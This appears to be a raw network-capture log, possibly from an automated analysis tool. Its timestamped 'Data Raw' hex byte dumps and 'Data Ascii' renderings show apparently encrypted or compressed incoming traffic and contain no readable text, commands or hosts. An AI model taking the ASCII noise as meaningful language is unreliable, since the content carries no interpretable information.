                                                                                                                                                            2022-09-29 12:44:57 UTC2384INData Raw: 5c ea 4b c6 a3 6b 43 28 b7 46 ab a0 24 b4 be df 6f be 56 a5 33 d9 0b 6b 89 18 7b 79 3a 6a fb a3 4e 7a 56 d3 f0 52 28 b2 0c 16 1b 2b 98 29 2c fd 46 7a 0c bf 91 51 8a 2b 14 d4 8d 4b 90 0a ad 92 05 25 e8 7f 65 e7 f1 4a d6 d4 93 89 e1 a1 0d 44 c7 21 39 31 18 7a e6 f9 41 e0 23 5c 10 d6 47 05 f5 96 f7 60 6c c8 8e 95 33 79 54 2f 86 46 ec 05 ee 4c c3 fd 12 4a a8 39 79 a5 c5 cd 64 ba db 70 6b da f1 79 81 a9 69 1a 6a 2a de 5c eb f0 c9 39 90 0b 9b 81 ab 95 93 cc d7 db 6d 4f 59 6f 67 b3 4d 18 59 f4 d8 42 58 86 67 02 08 6b 12 d7 82 b3 71 66 92 82 d1 8f 1c 21 d5 1e 5b ec 9b 22 9b 28 2c 16 b2 49 f3 32 05 88 77 28 c3 14 f4 f0 2c c9 4c fc 83 d0 45 ba 24 ab 01 28 d9 00 cd 79 8e 97 3c 1f 58 84 1c bc 18 55 d6 48 cc d1 e8 e0 19 92 1f 1b 2f 50 07 95 34 ff a3 24 cc dd df c2 78
                                                                                                                                                            Data Ascii: \KkC(F$oV3k{y:jNzVR(+),FzQ+K%eJD!91zA#\G`l3yT/FLJ9ydpkyij*\9mOYogMYBXgkqf!["(,I2w(,LE$(y<XUH/P4$x
                                                                                                                                                            2022-09-29 12:44:57 UTC2385INData Raw: 71 36 05 2e 60 6f d4 c4 a1 5d bb 0a 68 a8 a9 19 e3 c5 75 31 4e 83 4c 20 2c 9c 1b 64 26 30 df 3e 2c b5 dc d5 08 ad c1 11 6a df de 8d 2a 40 7a 95 86 bb 8f 46 40 c7 5f ab 1d 87 06 f1 ef 35 69 9d 38 9d 84 06 4d 25 05 cd 47 55 b3 f3 cd 48 e7 48 30 9b 18 2d b2 53 ac d0 75 5d a2 fa 0e 6e e2 f5 0e c1 55 e5 2d b2 77 f2 83 ab 2b 12 d2 37 1e 1f cd f8 f6 30 f8 8d 2a 9a 58 ad 15 55 be 7b ef 65 0e 18 73 eb 2a c3 2e 7e 27 2a 79 09 63 36 37 63 cd 2e 49 b6 f1 6e 94 84 ef d6 b0 76 2e f2 ba 0d 05 6a 7a a8 98 53 7d c6 95 fe 44 8a 40 1b a7 78 ea fd 31 38 84 fc 3b 9d 91 ae 00 5e 30 db 90 14 7e a1 e8 b2 4e 3f 8f 19 5e f9 bb 96 61 66 1c e6 76 1a 68 60 f7 5f f9 c4 a3 23 e0 fc 27 e2 3a cc ff 04 04 96 63 2e 40 b4 d8 10 a0 50 e4 c5 69 4c 42 8c cf c2 bb 81 a2 ef ff 15 d7 22 59 8c 4a
                                                                                                                                                            Data Ascii: q6.`o]hu1NL ,d&0>,j*@zF@_5i8M%GUHH0-Su]nU-w+70*XU{es*.~'*yc67c.Inv.jzS}D@x18;^0~N?^afvh`_#':c.@PiLB"YJ
                                                                                                                                                            2022-09-29 12:44:57 UTC2401INData Raw: bd 3d 9b 98 8c 5a 09 a0 bd 00 3b 7a e4 17 d1 8f c3 8e ba b8 04 06 f5 97 15 3a 81 93 d1 d5 19 b8 ab 82 d9 7f a7 4d 2a 53 8c 71 4e ae 7d 0f a0 f8 fb d9 81 84 66 f9 45 dc 8b b0 03 f1 ed bd 22 00 69 0f 51 f3 8e 58 5d 0c ce 9c a9 96 f5 72 9d 70 21 9a 96 4c 9b 5f 62 a6 ec f4 b2 c4 eb 60 89 ed ba 12 2a 00 93 19 e2 55 cd ea 61 75 77 28 87 0d 72 ab b5 c1 a8 71 0d 7e c2 57 e6 3d 4f be ad d4 c9 b3 58 0f b7 49 62 5c 4b b5 90 2d 96 48 1e b3 fc 3e 6e f1 60 d0 a6 eb ee 31 da c5 ef 5f 5a ba 0b 0e c0 43 02 59 9d 0f 37 bc 62 a0 cc 6a 8b dc db c5 70 d3 41 ad ec 75 56 96 c0 b2 9e 22 89 23 4d 4c 62 40 2c cd 79 23 42 4a 2b 2d 9d 9b c1 de ed 44 d4 7d 23 80 d0 c4 a8 f5 98 eb ea e2 6d 2b 00 fa 9f 69 6a 95 b7 7a ca 53 5c da 70 4a 28 95 15 cd 29 95 98 6a ad 7d 91 54 85 4a 67 ee 0d
                                                                                                                                                            Data Ascii: =Z;z:M*SqN}fE"iQX]rp!L_b`*Uauw(rq~W=OXIb\K-H>n`1_ZCY7bjpAuV"#MLb@,y#BJ+-D}#m+ijzS\pJ()j}TJg
                                                                                                                                                            2022-09-29 12:44:57 UTC2417INData Raw: 3f 47 83 65 1b 16 59 46 26 8e 34 27 b2 d9 53 c6 a6 f0 8b d8 df dd 2d d3 da df 72 31 66 72 ec db d0 a7 d2 4a 09 83 5b 18 c4 a4 d6 1f e0 58 bc e6 c9 10 a8 33 49 61 36 97 0f 8d 8b 75 84 e5 5b 46 6d 04 10 91 ca dc 76 84 21 dd d2 7b b6 0a b7 1a 2e 93 7c 3b c2 01 f7 dd 15 48 b8 a2 4a 7c fb 67 f6 11 fc 77 e9 08 30 62 84 7e 9c 7e 7e aa 2f a4 10 ac 65 21 f9 bd c0 33 73 8a b9 f1 41 77 a9 27 96 45 68 b9 7b ba 45 96 4f d5 62 f6 03 5a 9f a2 67 63 47 57 b0 f7 fd 24 a4 1f 40 67 27 05 db ce 51 28 61 bb 51 5d 4d a8 4b 34 7e 22 34 f8 0c 45 57 bb 33 2f ef c7 68 11 d8 52 fe 0c 88 2d 4f 5c 38 bf 4b c0 02 c9 31 22 3c 92 83 de fa 49 8f 7d fe 8c c2 29 bd f4 70 b9 8e ad ad 4a 68 0b 7e 84 b0 ab f4 80 ed 25 70 c0 4f 14 0d 4d b7 fc cf 3e 60 38 82 ab d1 b0 ff 81 89 6a 6c 2d 07 3f 7b
                                                                                                                                                            Data Ascii: ?GeYF&4'S-r1frJ[X3Ia6u[Fmv!{.|;HJ|gw0b~~~/e!3sAw'Eh{EObZgcGW$@g'Q(aQ]MK4~"4EW3/hR-O\8K1"<I})pJh~%pOM>`8jl-?{
                                                                                                                                                            2022-09-29 12:44:57 UTC2433INData Raw: 32 5f b0 53 33 41 7c ad d5 85 c1 fd 87 c0 79 8c a2 0d e0 6d 48 3c 85 cb af ac 83 4a 99 57 f9 18 d9 90 20 75 75 f4 80 f6 68 c0 7b 9a 8a 52 8c b6 d2 f4 b4 89 df 50 91 54 cb 05 cf d0 04 ff e7 2c e0 2d 9c 6f 2c 99 d4 c9 2c 0e 2d 51 ae a8 98 3f 82 95 cf 5d 68 a3 38 5c cc a9 58 7a ff cf 94 b7 32 15 ec 95 08 7b ab 3c 8b 69 47 cd ae bd bf 70 83 5d ba 84 9b 93 60 be d0 aa 38 b4 5b ca 48 14 ce 19 59 ff 75 15 83 2d 93 7b bc 5a f3 e1 1c 52 16 d9 e0 c9 df ea ae 92 35 bd 9b 16 ac 37 f2 ae 65 77 bc 36 cf 50 f3 4b ab e5 a4 f3 80 18 72 23 8f 9c 69 59 26 ff be 03 7d 67 ce 58 fa ed 44 6f 38 c6 fe 26 cb 54 82 c7 70 60 f1 0b 61 ac 03 db 8c ad 2a 73 d7 eb a0 e7 05 9e cf f4 36 5a 8c 0b 8b 14 c0 2d 10 96 66 d4 f9 17 43 a5 ac 35 1c 29 f8 c4 55 c0 00 3c 4b 49 ec 38 75 0f d9 dd b9
                                                                                                                                                            Data Ascii: 2_S3A|ymH<JW uuh{RPT,-o,,-Q?]h8\Xz2{<iGp]`8[HYu-{ZR57ew6PKr#iY&}gXDo8&Tp`a*s6Z-fC5)U<KI8u
                                                                                                                                                            2022-09-29 12:44:57 UTC2449INData Raw: ef ff f2 97 65 dd e2 ce d0 a9 19 28 d3 07 e0 40 1f 10 7f d9 d2 d1 dc f0 79 87 53 82 59 39 e7 f3 3e d4 73 29 83 87 b3 5d 66 59 b9 03 81 37 1e 18 53 0a 97 8d 09 32 fa 6e a7 01 c5 ec d2 af 93 ac 51 39 d5 6d 16 74 66 08 4f 4e 40 6a 64 2b 03 65 6a bc e2 7b a0 e0 06 38 7c 48 c0 6b 0d 5d 19 94 a0 5b 36 ff 9c 84 64 ed 37 dc a7 ab 28 66 1a 68 2c fb b4 f7 33 1b 9b 12 2b d9 18 c3 5b 34 d2 00 d2 b6 dc e7 e6 05 4a 44 21 4b 10 4d 27 12 ec 3d 7f 71 ba 0d 87 3e 45 60 4f 44 4e 0d f8 a5 dd 90 14 04 1c e9 f7 7d e5 e7 75 3d 81 ba d2 89 30 ca 42 f8 71 0f dc f4 ce 64 31 fa 2e 5a d6 06 0e 8a cc 49 79 33 cd 5c 40 54 dd e3 01 31 84 5e d5 0a cd 9a a8 30 c7 0d 21 7b d3 33 ea 6e 5f 8b a5 cd 31 e1 85 b3 a8 d2 e9 92 43 af d4 b2 50 7a 5d 88 63 60 48 b6 86 3a 32 33 34 32 0b 6d d2 42 63
                                                                                                                                                            Data Ascii: e(@ySY9>s)]fY7S2nQ9mtfON@jd+ej{8|Hk][6d7(fh,3+[4JD!KM'=q>E`ODN}u=0Bqd1.ZIy3\@T1^0!{3n_1CPz]c`H:2342mBc
                                                                                                                                                            2022-09-29 12:44:57 UTC2465INData Raw: a7 f9 84 41 d2 35 2a 88 7d 41 5e 20 1b d9 e0 34 20 61 87 2d 0f e1 67 bc aa d6 02 39 4c 32 14 71 20 d1 43 ed 90 bf b6 06 da 4b 10 52 45 e3 99 84 69 8d e9 58 0f 1b c1 49 88 f3 aa 30 8b 99 1c 5a 35 55 e1 d8 4a e7 1c 7c 58 90 63 fe 1a 38 6a d5 29 78 1b 69 e1 2b 55 48 2d e0 e8 3e eb e1 e0 d2 87 f6 13 6a d1 d6 dc 69 f0 dc bb 8f d8 a4 93 4e 93 f5 97 b1 18 f1 0d 18 8a 4f f5 74 cf 63 91 1c 66 bf bd 24 44 5e 6a 60 ba 30 16 30 b0 c5 05 10 b9 31 01 7a 98 1c 2a b5 1e 8f 7d ff 5c 31 e5 9d 62 83 a7 d3 f5 1a 58 5b 72 3b be de bb a7 83 2b 80 dd 1d 34 6e e1 2e e1 df 1d 47 57 d9 dc ac b6 92 81 98 ab 79 0a e9 d2 94 b2 1c 92 0f 03 26 0a 91 b3 ae 9c 61 d0 64 b5 53 ac e4 d0 2e 0e 16 c8 e8 16 79 3d 02 3b 60 e8 70 86 20 0b d7 a3 9f 45 ce aa c0 a2 0e 8e bf 1b f9 0a a9 d3 a8 9f 60
                                                                                                                                                            Data Ascii: A5*}A^ 4 a-g9L2q CKREiXI0Z5UJ|Xc8j)xi+UH->jiNOtcf$D^j`001z*}\1bX[r;+4n.GWy&adS.y=;`p E`
                                                                                                                                                            2022-09-29 12:44:57 UTC2481INData Raw: 81 7e 7f d5 97 ae 07 fa f9 d7 64 0b 2c 1f cc fd f9 3a 66 50 7c 7c 9c 1f 78 f3 5e 5d 7a 09 af 97 75 68 ef fd ef 29 78 55 e5 aa 05 97 5b b6 80 05 cf 8c 44 25 3f 54 d9 9f 0f 64 bc 75 c9 59 21 d0 3d 6f 94 28 55 d2 31 14 96 f7 34 e0 22 86 6f 1c b4 97 c2 fe f5 79 49 59 c5 c7 cf cb d5 b1 2e 18 b9 95 ef c6 dc 1a 67 b1 8c e9 df e9 d1 6e 3d f6 87 da 2c 9f 15 49 8c c4 2a 4b b8 9d 37 e4 d2 33 8b 9e 7d 18 b1 59 f4 78 22 dd e4 c7 bf c3 05 4c 02 9f 3c bd b1 b3 f2 33 75 40 ec 1b 32 60 2a 3c 36 c0 6e d4 68 7b 9b e3 d1 7e 74 f3 d9 83 3c 92 c2 68 2e 9a 57 43 de 65 63 75 5f 20 f1 e5 52 3d 12 53 54 b5 d4 21 c4 96 19 6c 7e 7b 90 cd eb de 32 4d a1 ed 35 30 4c 37 6a 8c 28 d0 cb 7c 98 78 e2 71 5a a0 d6 61 46 dd d0 f7 66 0b f0 46 58 17 af 60 af 78 9b e0 4e 93 fd f6 83 85 ba e3 3a
                                                                                                                                                            Data Ascii: ~d,:fP||x^]zuh)xU[D%?TduY!=o(U14"oyIY.gn=,I*K73}Yx"L<3u@2`*<6nh{~t<h.WCecu_ R=ST!l~{2M50L7j(|xqZaFfFX`xN:
                                                                                                                                                            2022-09-29 12:44:57 UTC2497INData Raw: 7f 04 75 42 f8 be 35 50 d7 fd 0a d7 0f 82 a1 2b 66 13 f9 40 29 b9 b6 13 83 00 27 43 f8 76 3f 67 1a 18 a7 8d e2 b9 f7 04 1d 3b 08 08 74 16 78 8f cc 60 c5 cf 54 68 d7 40 0b 3c e3 de b3 2f 9e 1f 52 bc b9 9e 1b 7d d2 d8 c5 33 bf a2 2d 8b 84 e7 f4 42 44 05 8a 4c cf 23 ce d4 9b b3 66 de 0f 67 22 ba 65 cf bf de 21 d9 ce 70 36 64 33 94 1c a9 ba 7a 35 1e 96 4c 84 24 a3 3d cb 88 84 26 e3 c7 86 51 3b 9d 91 7f 0c 6c a6 50 fc d1 7b fc 0e ca ae 7e 84 50 0f 83 0a f1 33 ef ee bb 12 76 e1 cf dc 48 35 83 fe bb 01 4b b7 8f 37 92 ea 2e a2 1a 63 97 a9 78 db ae c0 3b 3c 65 e5 f5 8d 3c 22 8b 1d 6c 76 ab 25 37 1c 22 c9 17 20 56 6e 20 5c 3f 4b b2 ec 29 c9 9e a7 8a 32 c0 80 94 d7 bb 83 ea 2d 25 d0 47 1f f1 39 83 1b c4 21 a4 fd c6 ee 85 e6 1c 36 c5 37 1b 69 21 72 f2 99 c9 89 ec ad
                                                                                                                                                            Data Ascii: uB5P+f@)'Cv?g;tx`Th@</R}3-BDL#fg"e!p6d3z5L$=&Q;lP{~P3vH5K7.cx;<e<"lv%7" Vn \?K)2-%G9!67i!r
                                                                                                                                                            2022-09-29 12:44:57 UTC2513INData Raw: 00 83 84 2a 86 07 d9 4c 87 4d 7e a5 98 a9 30 09 8d b0 44 7b 98 77 ea 52 6e ba e9 be 1e b7 c0 90 70 c9 ce 6b 1a 80 85 ad c2 d4 0b 8b 7d 64 23 32 59 4c 20 92 e3 80 28 66 c7 2f 23 68 af ec f3 78 91 25 0e 8e 5b e6 90 ec 5c af 32 ac d2 7d f7 bd 0c 2b 0a d4 ca 4a 41 0f d9 38 6a 1c 3d 60 82 9d d5 69 db 76 b5 f3 91 ca 4b 9e 0f cc 54 5c 6b 29 26 1a f6 5b 93 5f 68 df dc 1e 37 c6 50 8c 6d e9 04 92 40 b8 db fd c1 a4 f3 cb 16 e8 da 55 ed 43 00 b3 fa 11 ed 2a 78 b7 13 aa 4b 56 98 42 83 e2 8f e5 2c 5c 03 7c 13 8f 4d cc a4 d3 a1 45 1a e6 41 95 9d 16 37 9b 47 b9 16 78 8c 54 f1 ac e2 de 3d 67 29 6b c4 47 78 7f ad fd a0 d2 06 ff 07 6f e6 c4 43 9c c2 04 d7 70 3d 2a 23 bc bb b5 0b 97 06 7d b6 f4 9d 74 84 68 de bc 7b f5 df 58 d9 b9 8c cc 9e 13 9d dd 88 77 35 0a 41 b1 b1 3e c3
                                                                                                                                                            Data Ascii: *LM~0D{wRnpk}d#2YL (f/#hx%[\2}+JA8j=`ivKT\k)&[_h7Pm@UC*xKVB,\|MEA7GxT=g)kGxoCp=*#}th{Xw5A>
                                                                                                                                                            2022-09-29 12:44:57 UTC2529INData Raw: d8 9a a1 b8 e4 8f 95 f7 be 5e 43 93 1e f6 b2 cb 14 30 9e 39 02 20 62 78 9d 53 52 92 21 1f 87 22 48 46 dd 01 a6 35 0d c8 29 ac 70 86 26 d0 52 a8 27 f6 89 2f 5e 07 42 4c 64 81 ab ed 48 93 cf 82 54 d6 76 e1 f3 2e 1a b2 01 71 a8 76 e1 24 92 a7 34 28 2d 17 cf f2 37 3a 10 c5 42 80 52 83 0b b0 99 0a 11 07 a6 45 7b 0b 96 09 c8 a8 af 10 c3 55 2a 80 86 e1 98 de d7 51 ea 2a 0a 1b 44 61 67 e1 71 65 49 5f 69 bc c0 ec c2 a7 c3 3e 3f 1b c2 ad 7c e9 b0 c2 60 ae 6a 2e 24 0d ca 49 e6 97 ea 10 d1 73 bf 0e f8 5e 37 28 02 18 22 e2 58 05 d2 e5 5d 5c a8 c1 97 01 06 f7 7f 10 51 10 d1 c6 07 9d 3e 45 7e b8 c4 05 99 c3 c5 13 85 a7 f9 d9 8c 45 a4 4a d7 db f4 be b2 f0 05 04 47 91 23 9b 50 28 b9 a8 a5 2a d6 c8 71 c2 43 c1 da ac dc a0 73 fa 9a 8d a7 06 2a 64 e4 71 d9 ec 95 b8 db f8 72
                                                                                                                                                            Data Ascii: ^C09 bxSR!"HF5)p&R'/^BLdHTv.qv$4(-7:BRE{U*Q*DagqeI_i>?|`j.$Is^7("X]\Q>E~EJG#P(*qCs*dqr
                                                                                                                                                            2022-09-29 12:44:57 UTC2545INData Raw: 9d da 04 4e 8a c4 99 3a b5 58 d0 f1 0b 9e 35 17 d3 3a 4c 26 62 c7 76 b5 2a 4a 0b 58 9e 94 60 5e 7d 31 68 cb 0e 46 0a 16 96 23 15 31 ff 3e 69 be 1c a5 68 34 80 82 a0 cd ab 56 f4 45 d9 27 13 fc d8 b1 9b bf fc 77 7b 15 15 51 77 45 94 ff 85 2c 65 4d 8f 95 44 40 7d fd f7 b3 ab c6 9b 2a ef 0a 42 f9 a1 37 cd 76 45 f4 2c bc 81 9e b2 e5 8d 0f da 8e 5c b8 81 7b 83 71 63 58 bb 88 0d 58 1e ff c3 99 36 23 9b 03 bd f1 c9 ae 91 b1 4d 38 5f aa 3e 4b 5f 95 e0 67 ba 73 a0 7c 58 e4 e5 1e 51 53 00 55 a6 1b 5e 11 c1 72 38 11 4a 09 35 94 d4 ac 41 ca 39 d6 1a eb 92 eb a5 67 65 b3 5a d2 34 96 e9 95 df a4 8c e7 b7 03 78 e0 e6 51 cd 56 8d 7a 18 1e 07 ef c1 4f 80 b4 4f 1b 47 6d 3f 4b 80 bc 22 e4 b3 30 06 94 0f 32 a4 a7 04 08 3f 37 15 f6 59 66 3a 9e 3c 98 30 ff cf f7 80 54 e9 23 ea
                                                                                                                                                            Data Ascii: N:X5:L&bv*JX`^}1hF#1>ih4VE'w{QwE,eMD@}*B7vE,\{qcXX6#M8_>K_gs|XQSU^r8J5A9geZ4xQVzOOGm?K"02?7Yf:<0T#
                                                                                                                                                            2022-09-29 12:44:57 UTC2561INData Raw: 75 78 d1 87 e9 23 6f a6 74 d0 67 69 74 84 6e 31 ab f7 12 fd d3 6f cb 57 8d b3 bd b1 be 11 74 8c b8 ed ac e7 69 9d 45 87 f5 8e ad 9c 1b be dd 37 0b ee 13 95 e3 d6 c0 30 82 b2 f3 88 8b cc 6a c7 a9 70 52 a3 0c d4 3f c2 b2 7b 7a da cf 45 54 91 3f 34 f0 48 c5 14 35 d8 e7 48 12 38 1d a0 df cc 75 9c d3 20 91 13 db af d7 db 8b bf 84 a8 65 db 77 f1 29 5c db 28 7f e6 4b b2 80 8c 7e 88 4e 21 b9 05 92 0d 63 15 17 06 cd 07 a6 59 a5 5b 25 c9 6d c2 ba 78 53 e1 64 12 69 34 1e 20 a5 5f 04 23 85 4f 0b d2 c5 2a 01 14 3f 80 30 97 ac 07 8e d7 28 89 30 37 60 ed 91 b8 68 84 8b e0 4a 80 97 43 65 04 23 b3 aa 78 82 94 09 a7 85 35 83 95 3e 0d c1 3b 0a d2 90 77 ae bc b6 b6 94 31 09 60 20 bf bc 0b f6 72 1b fc 14 45 f9 1b c9 e3 21 8f 65 96 ac 20 9d 16 cc 12 d3 b9 fa 72 50 13 50 53 1f
                                                                                                                                                            Data Ascii: ux#otgitn1oWtiE70jpR?{zET?4H5H8u ew)\(K~N!cY[%mxSdi4 _#O*?0(07`hJCe#x5>;w1` rE!e rPPS
                                                                                                                                                            2022-09-29 12:44:57 UTC2577INData Raw: c8 fc 17 d3 86 ff d5 49 96 4b e3 6a 40 c7 4a 3b ae 8f 3d 2a 52 b9 df ca fd 51 ae 3e 02 9c f2 99 64 48 c3 1e d4 0f 31 ce b2 eb 40 4b c9 02 64 07 be 48 b8 49 b8 25 42 3a d6 e6 4e fa f7 8c 94 c3 4b 3f a9 7d 46 1a 67 60 43 03 05 b4 e4 0e 61 18 30 13 fa ee 4f a5 a5 15 14 b5 91 0a be fe de b7 eb 48 dc 98 cb bf 72 d6 85 6e 99 b1 0e c7 1b 68 67 08 2d f5 1f bd 8f e0 d4 c7 c9 19 b4 cd ae fa 9b cd fb 4f 00 d0 3a 5a e9 76 05 b4 3a 5d 7c 1b 80 06 cd 60 53 8a 20 37 11 eb d3 b0 6d 88 da d5 bd 1e 26 8c 6f fd 7d 2b 78 d8 82 c8 e5 d9 b5 47 c4 9c a0 6f ad a2 1b cc f7 e4 c0 e7 8d 37 a2 c8 c1 94 ff 4b c8 ef c1 3b cc 0e 88 60 a0 96 f6 44 38 3a 10 15 74 5c 5b da 41 64 56 a9 ff 8b 45 74 b7 ac 15 b9 1b 34 32 23 c7 f0 0b 99 98 91 07 c6 67 21 e6 81 32 b3 e3 3b a8 0a cf f0 32 cd 0e
                                                                                                                                                            Data Ascii: IKj@J;=*RQ>dH1@KdHI%B:NK?}Fg`Ca0OHrnhg-O:Zv:]|`S 7m&o}+xGo7K;`D8:t\[AdVEt42#g!2;2
                                                                                                                                                            2022-09-29 12:44:57 UTC2593INData Raw: cd e3 77 fc 0b 29 af 3a 44 cf 0b 85 1a ab 3e 6a ff d4 58 13 63 03 cd 42 13 b8 3f 24 21 51 be 45 d7 16 13 18 22 c8 88 ba b8 d1 34 25 98 4e 07 8c 72 ac 14 b4 03 69 d5 54 0b 9b 67 4e e9 fb 15 72 4e 2a 15 16 0f b3 57 f9 03 15 a0 2e 7d ca e8 41 94 10 c3 25 ba 86 b6 71 fe 7d 08 dd 7e 17 d5 ba d9 54 24 83 84 50 24 63 a6 9f 95 65 1f aa 6a 26 d8 8e d4 fb aa e7 71 95 56 a0 c1 71 10 0c ef 71 9b 02 55 cc 35 49 d3 46 a0 c0 12 e8 84 3b b9 08 32 87 0d 33 ea a8 55 4b 17 4f 86 39 da 1b 48 7e d9 52 99 4d a9 84 fe 40 51 11 fc 94 e5 82 08 3f 22 8a ae cb a6 9a ef 5a db f4 24 46 ac 2e e4 98 b0 27 48 0d 0c 6b d2 87 f8 af e0 17 84 e2 1b 34 43 da d7 06 76 7f d2 45 b7 22 db 64 8f 10 b0 fb 76 9e 98 50 c5 df 63 91 49 e8 d0 c0 ac 14 56 29 7f 5b 64 25 76 71 db 49 7b d1 8b 67 f2 52 d9
                                                                                                                                                            Data Ascii: w):D>jXcB?$!QE"4%NriTgNrN*W.}A%q}~T$P$cej&qVqqU5IF;23UKO9H~RM@Q?"Z$F.'Hk4CvE"dvPcIV)[d%vqI{gR
                                                                                                                                                            2022-09-29 12:44:57 UTC2609INData Raw: ec 26 1a 5d 5f c0 f8 1f 32 f0 a1 1b 9a e1 b1 d0 f4 7d 65 1e d4 02 e8 10 85 c0 ae 91 90 fe 20 d2 88 61 35 86 f7 b4 1b 25 87 67 d2 ef e4 67 c2 fc fc 94 e2 cf 44 0a c3 28 bb 94 b6 f4 cd e9 6f 3e 3b f5 13 02 be c8 4c a2 f4 d2 f8 19 78 b3 8f 9a 0b 47 f6 cd 89 1a 00 c9 84 71 b7 87 c9 2c b1 d9 85 96 d3 cc fa 8a 9a 90 e3 4a 19 79 5d 72 c5 18 3d 1a a3 74 8e 93 dd 7f ef b2 23 4e bc 0c 58 b2 66 52 af c2 8c 37 ad 9f d2 f8 1d 3b 11 d0 7a c9 85 d3 08 83 04 70 1c f8 65 6c 8c c3 d0 c6 0e 36 6d 68 45 ac da a3 3f 3d 60 60 ba d5 0a f1 a4 6d cb ac 02 6b c8 1b ee e4 00 ad 7c cf db ef 1f 89 5b 81 30 ee 3d 4f 99 3a 35 c6 7f b5 3c 4b 5b 57 a7 72 96 b4 d8 ee 4a 98 78 6e d3 dc ba 82 cd fd 55 ec 92 cc 84 c0 05 b8 63 4d ad 2f a3 df da 0d 86 fb 7d 57 fb 2f f5 3e 49 9e 48 12 8e a6 25
                                                                                                                                                            Data Ascii: &]_2}e a5%ggD(o>;LxGq,Jy]r=t#NXfR7;zpel6mhE?=``mk|[0=O:5<K[WrJxnUcM/}W/>IH%
                                                                                                                                                            2022-09-29 12:44:57 UTC2625INData Raw: 3f 7a 6e c4 6c 3b ba ec 00 70 a7 a5 a1 38 6e e1 4d 56 f7 f9 d2 5b d5 82 08 96 b0 b7 43 ce 0c b8 2d c7 b0 81 b2 6b d4 7d 6d 53 c9 7f 30 86 1e 3f 46 62 a2 6d 0d 4d 5f 64 ec 1b 2b 99 ed ce 25 09 06 52 9a 38 f9 f8 7d d5 c9 75 8b dc 54 42 f9 52 50 42 19 51 28 1e e1 f0 d4 4e 12 79 54 fb 1f 0a b2 cb 5b 40 78 fc f0 58 37 62 27 a0 98 51 a7 00 e5 a7 ab 1f 01 ee f6 1f 62 ab 0b 40 50 61 16 ea 9b a4 bc 13 10 5d 2d 99 37 98 cd c5 aa 13 11 31 ec bf 5e fd 04 f4 58 67 9f 83 ac 48 bb 26 17 ab e6 61 d9 c5 14 17 cb cb 8a b2 ea 1c 98 b0 b5 24 14 ca ba 06 96 d5 20 23 e6 c3 7d 4c 34 d6 bf 8e 18 1e bc 8f bf 16 60 ea 12 84 2b 99 d2 e0 5f 7a 55 23 78 d5 b1 5d e5 23 5f 8b f8 19 94 b1 05 60 06 30 07 5e 15 d9 e9 65 2d 7e 8a f0 46 1d 82 03 35 84 8e 01 ab d2 26 8f 10 31 1e 57 48 c2 d1
                                                                                                                                                            Data Ascii: ?znl;p8nMV[C-k}mS0?FbmM_d+%R8}uTBRPBQ(NyT[@xX7b'Qb@Pa]-71^XgH&a$ #}L4`+_zU#x]#_`0^e-~F5&1WH
                                                                                                                                                            2022-09-29 12:44:57 UTC2641INData Raw: ee e5 eb 29 30 a9 63 65 0c f1 fc 21 40 84 bc 9e 0d 8f ee 42 35 7b 9c 89 88 5e 5b 4d 0c 21 3d a5 94 d1 db 17 9a 37 0e 36 c4 bb 78 3b f7 50 a8 b2 97 92 6b a8 c4 4a e7 4f 09 1e 6b 54 a7 a8 ac d2 b1 ea 5e 51 25 ca 11 a7 e8 86 7e 3f 4c 5d b8 e4 80 bb 7f c8 dc e2 bb 12 b0 21 6d ca 20 bf 0b 6c e1 af 56 1a 7e dc de d3 8f d5 3e 93 bb 66 f8 47 4b 7b 7c 48 9f 21 2d f0 45 cd 14 e2 1d 2a ba ff df b0 4e 2a 74 ce 7c 0d 09 ac 11 ef 62 c3 c8 91 40 7a 23 ee b6 9e cd 8f 33 13 f2 6f 86 ac b3 bb 0b 73 8b cd fa 60 31 6d 5b 75 6d 7c 04 94 18 18 28 23 9c 6b 38 d8 a9 ea 54 18 8b 07 f1 2b 0e 45 e6 d0 f5 11 0f 56 6f 7d 7b 29 52 c7 0c e1 7a 20 fe 45 65 59 b4 fb bd 34 ef e3 16 d0 e1 43 db e7 69 83 7e 8a e7 a2 50 ef 59 4a e7 53 24 fc e6 cb 50 ff 82 1c 93 af 74 ca 63 62 14 e4 2c dd 74
                                                                                                                                                            Data Ascii: )0ce!@B5{^[M!=76x;PkJOkT^Q%~?L]!m lV~>fGK{|H!-E*N*t|b@z#3os`1m[um|(#k8T+EVo}{)Rz EeY4Ci~PYJS$Ptcb,t
                                                                                                                                                            2022-09-29 12:44:57 UTC2657INData Raw: f2 1d d7 47 f5 02 a9 30 7b a6 9a ba a9 2e 63 f2 98 22 30 bc f7 a2 81 14 72 2c 53 10 ad 62 a9 17 b4 6c 82 cd 9d 73 65 32 d7 c8 0b be bd b3 ba 9f 86 61 a3 29 d7 2b a0 69 d1 8f ee 64 6d 5b 6f 86 b9 76 bf d7 29 df 3e 4d a5 f0 a9 8f 0d 62 b7 d4 a5 16 77 3f 53 d0 64 17 2c 15 c4 1b 96 b4 fe 70 fa 5e 94 25 4f b7 5e 26 db cd a2 99 90 c6 09 b4 9f 03 fc 86 fe ec 83 da 2a a0 b5 ff 3b 31 eb 94 a7 11 0e 9e be d0 47 0c b6 a0 43 30 27 5d e6 3e 27 68 96 47 45 1d d0 09 09 bd f0 6d 77 13 60 98 53 7e c0 04 b4 ff 6a 9a 08 66 39 5b de c8 46 42 4a 42 4d c9 7d 18 ab a9 a1 40 d8 d8 30 16 3d 9b 67 ad c0 58 2b b6 6c 9e 6a 3e 52 42 a4 5f 03 01 bd 25 b2 55 7d 38 d4 ce 48 7b 56 1a cd 0b 89 39 49 0e c4 d8 cb be 4a 2a 92 31 3e ee 17 30 f6 e6 b2 e8 73 f9 0f 2c 55 e5 46 17 43 4c 14 47 2f
                                                                                                                                                            Data Ascii: G0{.c"0r,Sblse2a)+idm[ov)>Mbw?Sd,p^%O^&*;1GC0']>'hGEmw`S~jf9[FBJBM}@0=gX+lj>RB_%U}8H{V9IJ*1>0s,UFCLG/
